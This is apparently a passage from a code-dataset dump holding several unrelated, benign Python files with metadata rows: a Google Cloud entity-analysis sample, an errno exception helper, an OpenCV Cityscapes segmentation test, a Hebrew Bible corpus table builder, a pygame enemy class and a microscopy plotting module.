'--text_content', type=str, default='California is a state.')
args = parser.parse_args()
sample_analyze_entities(args.text_content)
if __name__ == '__main__':
main()
| 30.093333
| 80
| 0.712893
|
import sys
from google.cloud import language_v1
from google.cloud.language_v1 import enums
from google.cloud.language_v1 import enums
import six
def sample_analyze_entities(text_content):
client = language_v1.LanguageServiceClient()
if isinstance(text_content, six.binary_type):
text_content = text_content.decode('utf-8')
type_ = enums.Document.Type.PLAIN_TEXT
document = {'type': type_, 'content': text_content}
response = client.analyze_entities(document)
for entity in response.entities:
print('Entity name: {}'.format(entity.name))
print('Entity type: {}'.format(enums.Entity.Type(entity.type).name))
print('Entity salience score: {}'.format(entity.salience))
for mention in entity.mentions:
print('Mention: {}'.format(mention.text.content))
print('Mention type: {}'.format(
enums.EntityMention.Type(mention.type).name))
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'--text_content', type=str, default='California is a state.')
args = parser.parse_args()
sample_analyze_entities(args.text_content)
if __name__ == '__main__':
main()
| true
| true
|
f70b671c221dafd94c7b178303d0f5d51c443463
| 2,771
|
py
|
Python
|
py/_error.py
|
kantai/passe-pypy-taint-tracking
|
b60a3663f8fe89892dc182c8497aab97e2e75d69
|
[
"MIT"
] | 2
|
2016-07-06T23:30:20.000Z
|
2017-05-30T15:59:31.000Z
|
py/_error.py
|
benoitc/pypy
|
a3e1b12d1d01dc29056b7badc051ffc034297658
|
[
"MIT"
] | null | null | null |
py/_error.py
|
benoitc/pypy
|
a3e1b12d1d01dc29056b7badc051ffc034297658
|
[
"MIT"
] | 2
|
2020-07-09T08:14:22.000Z
|
2021-01-15T18:01:25.000Z
|
"""
create errno-specific classes for IO or os calls.
"""
import sys, os, errno
class Error(EnvironmentError):
def __repr__(self):
return "%s.%s %r: %s " %(self.__class__.__module__,
self.__class__.__name__,
self.__class__.__doc__,
" ".join(map(str, self.args)),
#repr(self.args)
)
def __str__(self):
s = "[%s]: %s" %(self.__class__.__doc__,
" ".join(map(str, self.args)),
)
return s
_winerrnomap = {
2: errno.ENOENT,
3: errno.ENOENT,
17: errno.EEXIST,
13: errno.EBUSY, # empty cd drive, but ENOMEDIUM seems unavailiable
22: errno.ENOTDIR,
267: errno.ENOTDIR,
5: errno.EACCES, # anything better?
}
class ErrorMaker(object):
""" lazily provides Exception classes for each possible POSIX errno
(as defined per the 'errno' module). All such instances
subclass EnvironmentError.
"""
Error = Error
_errno2class = {}
def __getattr__(self, name):
if name[0] == "_":
raise AttributeError(name)
eno = getattr(errno, name)
cls = self._geterrnoclass(eno)
setattr(self, name, cls)
return cls
def _geterrnoclass(self, eno):
try:
return self._errno2class[eno]
except KeyError:
clsname = errno.errorcode.get(eno, "UnknownErrno%d" %(eno,))
errorcls = type(Error)(clsname, (Error,),
{'__module__':'py.error',
'__doc__': os.strerror(eno)})
self._errno2class[eno] = errorcls
return errorcls
def checked_call(self, func, *args, **kwargs):
""" call a function and raise an errno-exception if applicable. """
__tracebackhide__ = True
try:
return func(*args, **kwargs)
except self.Error:
raise
except EnvironmentError:
cls, value, tb = sys.exc_info()
if not hasattr(value, 'errno'):
raise
__tracebackhide__ = False
errno = value.errno
try:
if not isinstance(value, WindowsError):
raise NameError
except NameError:
# we are not on Windows, or we got a proper OSError
cls = self._geterrnoclass(errno)
else:
try:
cls = self._geterrnoclass(_winerrnomap[errno])
except KeyError:
raise value
raise cls("%s%r" % (func.__name__, args))
__tracebackhide__ = True
error = ErrorMaker()
| 31.850575
| 75
| 0.517864
|
import sys, os, errno
class Error(EnvironmentError):
def __repr__(self):
return "%s.%s %r: %s " %(self.__class__.__module__,
self.__class__.__name__,
self.__class__.__doc__,
" ".join(map(str, self.args)),
)
def __str__(self):
s = "[%s]: %s" %(self.__class__.__doc__,
" ".join(map(str, self.args)),
)
return s
_winerrnomap = {
2: errno.ENOENT,
3: errno.ENOENT,
17: errno.EEXIST,
13: errno.EBUSY,
22: errno.ENOTDIR,
267: errno.ENOTDIR,
5: errno.EACCES,
}
class ErrorMaker(object):
Error = Error
_errno2class = {}
def __getattr__(self, name):
if name[0] == "_":
raise AttributeError(name)
eno = getattr(errno, name)
cls = self._geterrnoclass(eno)
setattr(self, name, cls)
return cls
def _geterrnoclass(self, eno):
try:
return self._errno2class[eno]
except KeyError:
clsname = errno.errorcode.get(eno, "UnknownErrno%d" %(eno,))
errorcls = type(Error)(clsname, (Error,),
{'__module__':'py.error',
'__doc__': os.strerror(eno)})
self._errno2class[eno] = errorcls
return errorcls
def checked_call(self, func, *args, **kwargs):
__tracebackhide__ = True
try:
return func(*args, **kwargs)
except self.Error:
raise
except EnvironmentError:
cls, value, tb = sys.exc_info()
if not hasattr(value, 'errno'):
raise
__tracebackhide__ = False
errno = value.errno
try:
if not isinstance(value, WindowsError):
raise NameError
except NameError:
cls = self._geterrnoclass(errno)
else:
try:
cls = self._geterrnoclass(_winerrnomap[errno])
except KeyError:
raise value
raise cls("%s%r" % (func.__name__, args))
__tracebackhide__ = True
error = ErrorMaker()
| true
| true
|
f70b6764a0549b85ceff5a1d7d0f64159ca92887
| 4,806
|
py
|
Python
|
opencv/sources/modules/dnn/test/cityscapes_semsegm_test_enet.py
|
vrushank-agrawal/opencv-x64-cmake
|
3f9486510d706c8ac579ac82f5d58f667f948124
|
[
"Apache-2.0"
] | null | null | null |
opencv/sources/modules/dnn/test/cityscapes_semsegm_test_enet.py
|
vrushank-agrawal/opencv-x64-cmake
|
3f9486510d706c8ac579ac82f5d58f667f948124
|
[
"Apache-2.0"
] | null | null | null |
opencv/sources/modules/dnn/test/cityscapes_semsegm_test_enet.py
|
vrushank-agrawal/opencv-x64-cmake
|
3f9486510d706c8ac579ac82f5d58f667f948124
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import sys
import os
import fnmatch
import argparse
try:
import cv2 as cv
except ImportError:
raise ImportError('Can\'t find OpenCV Python module. If you\'ve built it from sources without installation, '
'configure environment variable PYTHONPATH to "opencv_build_dir/lib" directory (with "python3" subdirectory if required)')
try:
import torch
except ImportError:
raise ImportError('Can\'t find pytorch. Please install it by following instructions on the official site')
from torch.utils.serialization import load_lua
from pascal_semsegm_test_fcn import eval_segm_result, get_conf_mat, get_metrics, DatasetImageFetch, SemSegmEvaluation
from imagenet_cls_test_alexnet import Framework, DnnCaffeModel
class NormalizePreproc:
def __init__(self):
pass
@staticmethod
def process(img):
image_data = np.array(img).transpose(2, 0, 1).astype(np.float32)
image_data = np.expand_dims(image_data, 0)
image_data /= 255.0
return image_data
class CityscapesDataFetch(DatasetImageFetch):
img_dir = ''
segm_dir = ''
segm_files = []
colors = []
i = 0
def __init__(self, img_dir, segm_dir, preproc):
self.img_dir = img_dir
self.segm_dir = segm_dir
self.segm_files = sorted([img for img in self.locate('*_color.png', segm_dir)])
self.colors = self.get_colors()
self.data_prepoc = preproc
self.i = 0
@staticmethod
def get_colors():
result = []
colors_list = (
(0, 0, 0), (128, 64, 128), (244, 35, 232), (70, 70, 70), (102, 102, 156), (190, 153, 153), (153, 153, 153),
(250, 170, 30), (220, 220, 0), (107, 142, 35), (152, 251, 152), (70, 130, 180), (220, 20, 60), (255, 0, 0),
(0, 0, 142), (0, 0, 70), (0, 60, 100), (0, 80, 100), (0, 0, 230), (119, 11, 32))
for c in colors_list:
result.append(DatasetImageFetch.pix_to_c(c))
return result
def __iter__(self):
return self
def next(self):
if self.i < len(self.segm_files):
segm_file = self.segm_files[self.i]
segm = cv.imread(segm_file, cv.IMREAD_COLOR)[:, :, ::-1]
segm = cv.resize(segm, (1024, 512), interpolation=cv.INTER_NEAREST)
img_file = self.rreplace(self.img_dir + segm_file[len(self.segm_dir):], 'gtFine_color', 'leftImg8bit')
assert os.path.exists(img_file)
img = cv.imread(img_file, cv.IMREAD_COLOR)[:, :, ::-1]
img = cv.resize(img, (1024, 512))
self.i += 1
gt = self.color_to_gt(segm, self.colors)
img = self.data_prepoc.process(img)
return img, gt
else:
self.i = 0
raise StopIteration
def get_num_classes(self):
return len(self.colors)
@staticmethod
def locate(pattern, root_path):
for path, dirs, files in os.walk(os.path.abspath(root_path)):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(path, filename)
@staticmethod
def rreplace(s, old, new, occurrence=1):
li = s.rsplit(old, occurrence)
return new.join(li)
class TorchModel(Framework):
net = object
def __init__(self, model_file):
self.net = load_lua(model_file)
def get_name(self):
return 'Torch'
def get_output(self, input_blob):
tensor = torch.FloatTensor(input_blob)
out = self.net.forward(tensor).numpy()
return out
class DnnTorchModel(DnnCaffeModel):
net = cv.dnn.Net()
def __init__(self, model_file):
self.net = cv.dnn.readNetFromTorch(model_file)
def get_output(self, input_blob):
self.net.setBlob("", input_blob)
self.net.forward()
return self.net.getBlob(self.net.getLayerNames()[-1])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--imgs_dir", help="path to Cityscapes validation images dir, imgsfine/leftImg8bit/val")
parser.add_argument("--segm_dir", help="path to Cityscapes dir with segmentation, gtfine/gtFine/val")
parser.add_argument("--model", help="path to torch model, download it here: "
"https://www.dropbox.com/sh/dywzk3gyb12hpe5/AAD5YkUa8XgMpHs2gCRgmCVCa")
parser.add_argument("--log", help="path to logging file")
args = parser.parse_args()
prep = NormalizePreproc()
df = CityscapesDataFetch(args.imgs_dir, args.segm_dir, prep)
fw = [TorchModel(args.model),
DnnTorchModel(args.model)]
segm_eval = SemSegmEvaluation(args.log)
segm_eval.process(fw, df)
| 34.085106
| 145
| 0.615689
|
import numpy as np
import sys
import os
import fnmatch
import argparse
try:
import cv2 as cv
except ImportError:
raise ImportError('Can\'t find OpenCV Python module. If you\'ve built it from sources without installation, '
'configure environment variable PYTHONPATH to "opencv_build_dir/lib" directory (with "python3" subdirectory if required)')
try:
import torch
except ImportError:
raise ImportError('Can\'t find pytorch. Please install it by following instructions on the official site')
from torch.utils.serialization import load_lua
from pascal_semsegm_test_fcn import eval_segm_result, get_conf_mat, get_metrics, DatasetImageFetch, SemSegmEvaluation
from imagenet_cls_test_alexnet import Framework, DnnCaffeModel
class NormalizePreproc:
def __init__(self):
pass
@staticmethod
def process(img):
image_data = np.array(img).transpose(2, 0, 1).astype(np.float32)
image_data = np.expand_dims(image_data, 0)
image_data /= 255.0
return image_data
class CityscapesDataFetch(DatasetImageFetch):
img_dir = ''
segm_dir = ''
segm_files = []
colors = []
i = 0
def __init__(self, img_dir, segm_dir, preproc):
self.img_dir = img_dir
self.segm_dir = segm_dir
self.segm_files = sorted([img for img in self.locate('*_color.png', segm_dir)])
self.colors = self.get_colors()
self.data_prepoc = preproc
self.i = 0
@staticmethod
def get_colors():
result = []
colors_list = (
(0, 0, 0), (128, 64, 128), (244, 35, 232), (70, 70, 70), (102, 102, 156), (190, 153, 153), (153, 153, 153),
(250, 170, 30), (220, 220, 0), (107, 142, 35), (152, 251, 152), (70, 130, 180), (220, 20, 60), (255, 0, 0),
(0, 0, 142), (0, 0, 70), (0, 60, 100), (0, 80, 100), (0, 0, 230), (119, 11, 32))
for c in colors_list:
result.append(DatasetImageFetch.pix_to_c(c))
return result
def __iter__(self):
return self
def next(self):
if self.i < len(self.segm_files):
segm_file = self.segm_files[self.i]
segm = cv.imread(segm_file, cv.IMREAD_COLOR)[:, :, ::-1]
segm = cv.resize(segm, (1024, 512), interpolation=cv.INTER_NEAREST)
img_file = self.rreplace(self.img_dir + segm_file[len(self.segm_dir):], 'gtFine_color', 'leftImg8bit')
assert os.path.exists(img_file)
img = cv.imread(img_file, cv.IMREAD_COLOR)[:, :, ::-1]
img = cv.resize(img, (1024, 512))
self.i += 1
gt = self.color_to_gt(segm, self.colors)
img = self.data_prepoc.process(img)
return img, gt
else:
self.i = 0
raise StopIteration
def get_num_classes(self):
return len(self.colors)
@staticmethod
def locate(pattern, root_path):
for path, dirs, files in os.walk(os.path.abspath(root_path)):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(path, filename)
@staticmethod
def rreplace(s, old, new, occurrence=1):
li = s.rsplit(old, occurrence)
return new.join(li)
class TorchModel(Framework):
net = object
def __init__(self, model_file):
self.net = load_lua(model_file)
def get_name(self):
return 'Torch'
def get_output(self, input_blob):
tensor = torch.FloatTensor(input_blob)
out = self.net.forward(tensor).numpy()
return out
class DnnTorchModel(DnnCaffeModel):
net = cv.dnn.Net()
def __init__(self, model_file):
self.net = cv.dnn.readNetFromTorch(model_file)
def get_output(self, input_blob):
self.net.setBlob("", input_blob)
self.net.forward()
return self.net.getBlob(self.net.getLayerNames()[-1])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--imgs_dir", help="path to Cityscapes validation images dir, imgsfine/leftImg8bit/val")
parser.add_argument("--segm_dir", help="path to Cityscapes dir with segmentation, gtfine/gtFine/val")
parser.add_argument("--model", help="path to torch model, download it here: "
"https://www.dropbox.com/sh/dywzk3gyb12hpe5/AAD5YkUa8XgMpHs2gCRgmCVCa")
parser.add_argument("--log", help="path to logging file")
args = parser.parse_args()
prep = NormalizePreproc()
df = CityscapesDataFetch(args.imgs_dir, args.segm_dir, prep)
fw = [TorchModel(args.model),
DnnTorchModel(args.model)]
segm_eval = SemSegmEvaluation(args.log)
segm_eval.process(fw, df)
| true
| true
|
f70b677ef4defae6580fc8ce081c318d2bf035c9
| 7,857
|
py
|
Python
|
workflow/scripts/hebrew/build_hebrew_tables.py
|
CambridgeSemiticsLab/translation_traditions_HB
|
8f2c4d263cc5dc1542184343a384b44bf705770d
|
[
"MIT"
] | 2
|
2020-11-30T06:34:10.000Z
|
2021-11-16T14:16:24.000Z
|
workflow/scripts/hebrew/build_hebrew_tables.py
|
CambridgeSemiticsLab/Gesenius_data
|
8f2c4d263cc5dc1542184343a384b44bf705770d
|
[
"MIT"
] | null | null | null |
workflow/scripts/hebrew/build_hebrew_tables.py
|
CambridgeSemiticsLab/Gesenius_data
|
8f2c4d263cc5dc1542184343a384b44bf705770d
|
[
"MIT"
] | null | null | null |
import re
import sys
import csv
import json
import pickle
import collections
from pathlib import Path
from tf.fabric import Fabric
from book_formats import get_book_maps, etcbc2sbl, etcbc2abbr
from verb_form import get_verbform, get_cl_verbform
from modify_domain import permissive_q
from synvar_carc import in_dep_calc as clause_relator
from modify_cltype import simplify_cl_type
from tag_args import clause_objects, get_loca_assocs, clause_locas, clause_time, clause_args
# NB that working directory when script is executed is
# /workflow; because we have some utilities that we want
# to run from above directory, we need to append it to path
sys.path.append('scripts')
from build_tables import build_sample_tables
# fire up Text-Fabric with BHSA data
TF = Fabric(snakemake.input['tf_mods'], silent='deep')
features = """
sp pdp vs vt ps gn nu
lex language gloss voc_lex voc_lex_utf8
function number label
typ code rela mother domain txt
genre
sense
nhead
funct_assoc
"""
bhsa = TF.load(features, silent='deep')
F, E, T, L, Fs, = bhsa.F, bhsa.E, bhsa.T, bhsa.L, bhsa.Fs
# load GBI Hebrew data
with open(snakemake.input.bhsa2gbi, 'rb') as infile:
bhsa2gbi = pickle.load(infile)
# preprocess data
bookmap = get_book_maps(bhsa)
loca_lexs = get_loca_assocs(bhsa)
def join_on(nodes, jchar='_', default=''):
"""Join words on a char and ensure they are pre/appended with that char.
The pre/appending provides easy-to-match word boundaries.
"""
joined_string = f'{jchar}'.join(nodes)
if not joined_string:
return default
else:
return f'{jchar}{joined_string}{jchar}'
def get_preceding_words(node, context='clause'):
"""Retrieves words from before a verb within a context"""
context_node = L.u(node, context)[0]
context_words = L.d(context_node, 'word')
prec_words = context_words[:context_words.index(node)]
return prec_words
def main_row(node):
"""Compile all relevant BHSA data for a given node."""
# data on this clause itself
book, chapter, verse = T.sectionFromNode(node)
booksbl = etcbc2sbl[book]
bookabbr = etcbc2abbr[book]
ref_string = f'{book} {chapter}:{verse}'
ref_sbl = f'{booksbl} {chapter}:{verse}'
ref_abbr = f'{bookabbr} {chapter}:{verse}'
verse_node = L.u(node, 'verse')[0]
clause_atom = L.u(node, 'clause_atom')[0]
clause = L.u(node, 'clause')[0]
sent = L.u(node, 'sentence')[0]
clause_type = F.typ.v(clause)
preceding_words = get_preceding_words(node)
prec_lexes = join_on((F.lex.v(w) for w in preceding_words), default='Ø')
prec_pos = join_on((F.pdp.v(w) for w in preceding_words), default='Ø')
domain2 = permissive_q(clause, bhsa)
verbform = get_verbform(node, bhsa, bhsa2gbi)
cl_type_simp = simplify_cl_type(clause_atom, prec_lexes, bhsa)
# work around for participle contexts without
# clause data
if verbform == 'ptcp' and clause_type != 'Ptcp':
cl_args = None
has_q = None
cl_args = None
do_clause = False
else:
do_clause = True
cl_args = clause_args(node, bhsa)
has_q = ('Q' in cl_args) * 1 # look for question particles
cl_args = re.match('.*V', cl_args)[0] # NB ignore post-verbal arguments
# collect preceding particles only
particle_types = {'nega', 'advb', 'prep', 'conj', 'prde', 'prin', 'intj', 'inrg'}
prec_particles = join_on(
(F.lex.v(w) for w in preceding_words
if F.pdp.v(w) in particle_types)
, default='Ø')
null_string = ''
row_data = {
'bhsa_node': node,
'ref': ref_string,
'book': book,
'book_super': bookmap['super'].get(book, book),
'canon_part': bookmap['tripart'][book],
'period': bookmap['period'].get(book, ''),
'genre': F.genre.v(verse_node),
'domain2': domain2,
'text_full': F.g_word_utf8.v(node),
'text_plain': F.g_cons_utf8.v(node),
'lex': F.lex_utf8.v(node),
'lex_etcbc': F.lex.v(node),
'gloss': F.gloss.v(node),
'verb_form': verbform,
'stem': F.vs.v(node),
'person': F.ps.v(node),
'gender': F.gn.v(node),
'number': F.nu.v(node),
'valence': F.sense.v(node),
'clause_atom': T.text(clause_atom),
'clause': T.text(clause),
'verse': T.text(verse_node),
'sentence': T.text(sent),
'txt_type': F.txt.v(clause),
'clause_type': clause_type,
'cltype_simp': cl_type_simp,
'clause_rela': clause_relator(clause, bhsa),
'cl_args': cl_args,
'is_question': has_q,
'prec_lexes': prec_lexes,
'prec_pos': prec_pos,
'prec_part': prec_particles,
'ref_sbl': ref_sbl,
'ref_abbr': ref_abbr,
}
if do_clause:
# provide clause argument data
# objects
row_data.update(
clause_objects(node, clause_atom, clause, bhsa)
)
# locatives
row_data.update(
clause_locas(node, loca_lexs, bhsa)
)
row_data.update(
clause_time(node, bhsa)
)
# convert to boolean 0 or 1 to avoid indexing
# pivot tables with booleans
row_data['has_objc'] = 1 * row_data['has_objc']
row_data['has_loca'] = 1 * row_data['has_loca']
return row_data
def nearby_clatom_data(clatom_lookup, starting_clatom):
"""Retrieve data on a nearby clause_atom, if it exists
Args:
clatom_lookup: iterable of clause_atom nodes or empty
Returns:
dict of data on the first clause_atom in the lookup, if
one was found, else an empty dict
"""
rel_dat = {
'clause':'', 'cl_atom': '', 'clause_atom':'',
'rela': '', 'domain2': '', 'verbtype': '',
'type': '', 'verb_ps': '', 'verb_lex': '',
'verbplain': '', 'intertext': ''
}
# retrive data on first clause in the lookup; if there is one
if clatom_lookup:
cl_atom = rel_dat['cl_atom'] = clatom_lookup[0]
cl = L.u(cl_atom, 'clause')[0]
verb = next((w for w in L.d(cl_atom, 'word') if F.pdp.v(w) == 'verb'), 0)
rel_dat['verb_lex'] = F.lex.v(verb)
rel_dat['verb_ps'] = F.ps.v(verb)
rel_dat['type'] = F.typ.v(cl_atom)
rel_dat['verbplain'] = F.g_cons_utf8.v(verb)
rel_dat['verbtype'] = get_cl_verbform(cl_atom, bhsa, bhsa2gbi)
rel_dat['domain2'] = permissive_q(cl, bhsa) # domain with permissive Q
rel_dat['rela'] = clause_relator(cl, bhsa)
rel_dat['clause_atom'] = T.text(cl_atom)
rel_dat['clause'] = T.text(cl)
# capture text in between starting node and this one
if cl_atom - starting_clatom <= 3:
if cl_atom < starting_clatom:
interm_clatoms = list(range(cl_atom, starting_clatom))
else:
interm_clatoms = list(range(starting_clatom+1, cl_atom+1))
for cl in interm_clatoms:
rel_dat['intertext'] += T.text(cl)
return rel_dat
def clrela_row(node):
"""Retrieve data on related clauses."""
clause_atom = L.u(node, 'clause_atom')[0]
# build data on the mother/daughter clause
relas = {
'mother': nearby_clatom_data(E.mother.f(clause_atom), clause_atom),
'daught': nearby_clatom_data(E.mother.t(clause_atom), clause_atom)
}
row_data = {'bhsa_node': node}
for relcl, rcdata in relas.items():
row_data.update({
f'{relcl}_{k}': rcdata[k] for k in rcdata
})
return row_data
rowmakers = [main_row, clrela_row]
build_sample_tables(
rowmakers,
snakemake.input.sample,
snakemake.output
)
| 34.012987
| 92
| 0.616393
|
import re
import sys
import csv
import json
import pickle
import collections
from pathlib import Path
from tf.fabric import Fabric
from book_formats import get_book_maps, etcbc2sbl, etcbc2abbr
from verb_form import get_verbform, get_cl_verbform
from modify_domain import permissive_q
from synvar_carc import in_dep_calc as clause_relator
from modify_cltype import simplify_cl_type
from tag_args import clause_objects, get_loca_assocs, clause_locas, clause_time, clause_args
sys.path.append('scripts')
from build_tables import build_sample_tables
TF = Fabric(snakemake.input['tf_mods'], silent='deep')
features = """
sp pdp vs vt ps gn nu
lex language gloss voc_lex voc_lex_utf8
function number label
typ code rela mother domain txt
genre
sense
nhead
funct_assoc
"""
bhsa = TF.load(features, silent='deep')
F, E, T, L, Fs, = bhsa.F, bhsa.E, bhsa.T, bhsa.L, bhsa.Fs
with open(snakemake.input.bhsa2gbi, 'rb') as infile:
bhsa2gbi = pickle.load(infile)
bookmap = get_book_maps(bhsa)
loca_lexs = get_loca_assocs(bhsa)
def join_on(nodes, jchar='_', default=''):
joined_string = f'{jchar}'.join(nodes)
if not joined_string:
return default
else:
return f'{jchar}{joined_string}{jchar}'
def get_preceding_words(node, context='clause'):
context_node = L.u(node, context)[0]
context_words = L.d(context_node, 'word')
prec_words = context_words[:context_words.index(node)]
return prec_words
def main_row(node):
book, chapter, verse = T.sectionFromNode(node)
booksbl = etcbc2sbl[book]
bookabbr = etcbc2abbr[book]
ref_string = f'{book} {chapter}:{verse}'
ref_sbl = f'{booksbl} {chapter}:{verse}'
ref_abbr = f'{bookabbr} {chapter}:{verse}'
verse_node = L.u(node, 'verse')[0]
clause_atom = L.u(node, 'clause_atom')[0]
clause = L.u(node, 'clause')[0]
sent = L.u(node, 'sentence')[0]
clause_type = F.typ.v(clause)
preceding_words = get_preceding_words(node)
prec_lexes = join_on((F.lex.v(w) for w in preceding_words), default='Ø')
prec_pos = join_on((F.pdp.v(w) for w in preceding_words), default='Ø')
domain2 = permissive_q(clause, bhsa)
verbform = get_verbform(node, bhsa, bhsa2gbi)
cl_type_simp = simplify_cl_type(clause_atom, prec_lexes, bhsa)
if verbform == 'ptcp' and clause_type != 'Ptcp':
cl_args = None
has_q = None
cl_args = None
do_clause = False
else:
do_clause = True
cl_args = clause_args(node, bhsa)
has_q = ('Q' in cl_args) * 1
cl_args = re.match('.*V', cl_args)[0]
particle_types = {'nega', 'advb', 'prep', 'conj', 'prde', 'prin', 'intj', 'inrg'}
prec_particles = join_on(
(F.lex.v(w) for w in preceding_words
if F.pdp.v(w) in particle_types)
, default='Ø')
null_string = ''
row_data = {
'bhsa_node': node,
'ref': ref_string,
'book': book,
'book_super': bookmap['super'].get(book, book),
'canon_part': bookmap['tripart'][book],
'period': bookmap['period'].get(book, ''),
'genre': F.genre.v(verse_node),
'domain2': domain2,
'text_full': F.g_word_utf8.v(node),
'text_plain': F.g_cons_utf8.v(node),
'lex': F.lex_utf8.v(node),
'lex_etcbc': F.lex.v(node),
'gloss': F.gloss.v(node),
'verb_form': verbform,
'stem': F.vs.v(node),
'person': F.ps.v(node),
'gender': F.gn.v(node),
'number': F.nu.v(node),
'valence': F.sense.v(node),
'clause_atom': T.text(clause_atom),
'clause': T.text(clause),
'verse': T.text(verse_node),
'sentence': T.text(sent),
'txt_type': F.txt.v(clause),
'clause_type': clause_type,
'cltype_simp': cl_type_simp,
'clause_rela': clause_relator(clause, bhsa),
'cl_args': cl_args,
'is_question': has_q,
'prec_lexes': prec_lexes,
'prec_pos': prec_pos,
'prec_part': prec_particles,
'ref_sbl': ref_sbl,
'ref_abbr': ref_abbr,
}
if do_clause:
row_data.update(
clause_objects(node, clause_atom, clause, bhsa)
)
row_data.update(
clause_locas(node, loca_lexs, bhsa)
)
row_data.update(
clause_time(node, bhsa)
)
row_data['has_objc'] = 1 * row_data['has_objc']
row_data['has_loca'] = 1 * row_data['has_loca']
return row_data
def nearby_clatom_data(clatom_lookup, starting_clatom):
rel_dat = {
'clause':'', 'cl_atom': '', 'clause_atom':'',
'rela': '', 'domain2': '', 'verbtype': '',
'type': '', 'verb_ps': '', 'verb_lex': '',
'verbplain': '', 'intertext': ''
}
if clatom_lookup:
cl_atom = rel_dat['cl_atom'] = clatom_lookup[0]
cl = L.u(cl_atom, 'clause')[0]
verb = next((w for w in L.d(cl_atom, 'word') if F.pdp.v(w) == 'verb'), 0)
rel_dat['verb_lex'] = F.lex.v(verb)
rel_dat['verb_ps'] = F.ps.v(verb)
rel_dat['type'] = F.typ.v(cl_atom)
rel_dat['verbplain'] = F.g_cons_utf8.v(verb)
rel_dat['verbtype'] = get_cl_verbform(cl_atom, bhsa, bhsa2gbi)
rel_dat['domain2'] = permissive_q(cl, bhsa)
rel_dat['rela'] = clause_relator(cl, bhsa)
rel_dat['clause_atom'] = T.text(cl_atom)
rel_dat['clause'] = T.text(cl)
if cl_atom - starting_clatom <= 3:
if cl_atom < starting_clatom:
interm_clatoms = list(range(cl_atom, starting_clatom))
else:
interm_clatoms = list(range(starting_clatom+1, cl_atom+1))
for cl in interm_clatoms:
rel_dat['intertext'] += T.text(cl)
return rel_dat
def clrela_row(node):
clause_atom = L.u(node, 'clause_atom')[0]
relas = {
'mother': nearby_clatom_data(E.mother.f(clause_atom), clause_atom),
'daught': nearby_clatom_data(E.mother.t(clause_atom), clause_atom)
}
row_data = {'bhsa_node': node}
for relcl, rcdata in relas.items():
row_data.update({
f'{relcl}_{k}': rcdata[k] for k in rcdata
})
return row_data
rowmakers = [main_row, clrela_row]
build_sample_tables(
rowmakers,
snakemake.input.sample,
snakemake.output
)
| true
| true
|
f70b67b26a39bfb74bdcfdb0a3cd91faaca8a144
| 984
|
py
|
Python
|
PyShooter/enemies/zigzagenemy.py
|
ildave/PyShooter
|
ff04fcbcbd144a6959b291fe5242afff6d616eaa
|
[
"MIT"
] | null | null | null |
PyShooter/enemies/zigzagenemy.py
|
ildave/PyShooter
|
ff04fcbcbd144a6959b291fe5242afff6d616eaa
|
[
"MIT"
] | null | null | null |
PyShooter/enemies/zigzagenemy.py
|
ildave/PyShooter
|
ff04fcbcbd144a6959b291fe5242afff6d616eaa
|
[
"MIT"
] | null | null | null |
import pygame
import random
import math
import enemies.enemy
class ZigZagEnemy(enemies.enemy.Enemy):
def __init__(self, game):
super().__init__(game)
self.timer = self.game.getRepeateTimer()
self.timer.duration = 3000
self.timer.action = self.changeAngle
def changeAngle(self):
if random.randint(0, 1) == 0:
self.angle += math.pi / 2
else:
self.angle -= math.pi / 2
def update(self, elapsed, gameScene):
self.y += math.sin(self.angle) * self.vspeed * elapsed
self.x += math.cos(self.angle) * self.hspeed * elapsed
self.rect.x = self.x
self.rect.y = self.y
if not self.active and not self.inGame():
pass
if not self.active and self.inGame():
self.active = True
if self.active and self.inGame():
pass
if self.active and not self.inGame():
self.kill()
self.timer.cancel()
| 28.114286
| 64
| 0.575203
|
import pygame
import random
import math
import enemies.enemy
class ZigZagEnemy(enemies.enemy.Enemy):
def __init__(self, game):
super().__init__(game)
self.timer = self.game.getRepeateTimer()
self.timer.duration = 3000
self.timer.action = self.changeAngle
def changeAngle(self):
if random.randint(0, 1) == 0:
self.angle += math.pi / 2
else:
self.angle -= math.pi / 2
def update(self, elapsed, gameScene):
self.y += math.sin(self.angle) * self.vspeed * elapsed
self.x += math.cos(self.angle) * self.hspeed * elapsed
self.rect.x = self.x
self.rect.y = self.y
if not self.active and not self.inGame():
pass
if not self.active and self.inGame():
self.active = True
if self.active and self.inGame():
pass
if self.active and not self.inGame():
self.kill()
self.timer.cancel()
| true
| true
|
f70b6a6e97aabeec0b3ae86dcf3cfa2a57216dff
| 4,559
|
py
|
Python
|
mmhelper/output.py
|
jmetz/momanalysis
|
8d71490c99127568b184784890258e9a6ef876ef
|
[
"MIT"
] | null | null | null |
mmhelper/output.py
|
jmetz/momanalysis
|
8d71490c99127568b184784890258e9a6ef876ef
|
[
"MIT"
] | 3
|
2019-07-25T13:43:15.000Z
|
2019-11-04T12:39:22.000Z
|
mmhelper/output.py
|
jmetz/momanalysis
|
8d71490c99127568b184784890258e9a6ef876ef
|
[
"MIT"
] | 1
|
2021-03-28T03:00:21.000Z
|
2021-03-28T03:00:21.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 09 09:59:13 2017
@author: as624
"""
import csv
import os
import matplotlib.pyplot as plt
import numpy as np
def output_detection_figures(
image, wells, bacteria, timeindex, output_dir):
"""
Produces and saves figures showing the output from the detection
Parameters
------
image : ndarray (2D)
The initial image that detection was run on
wells : ndarray (2D) of dtype int
A labelled image showing the detected wells
bacteria : ndarray (2D) of dtype int
A labelled image showing the detected bacteria
timeindex : int
The timepoint that has been analysed
output_dir : str (path)
Where to save the images
"""
# For detection figures, labels not needed (I think)?
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
plt.contour(wells > 0, levels=[0.5], colors=['y'])
#plt.contour(channel>0, levels=[0.5], colors=['r'])
for lab_bac in range(1, bacteria.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
plt.contour(bacteria == lab_bac, levels=[0.5], colors=[col])
plt.savefig(os.path.join(
output_dir, "detection_frame_{:06d}".format(timeindex)))
plt.close()
def output_tracking_figures(
data,
fullwellimages,
wellcoords,
allbacteria,
output_dir,
bacteria_lineage):
"""
Produces and saves figures showing the output after tracking
Parameters
------
data : list of ndarrays
List of initial image that detection was run on
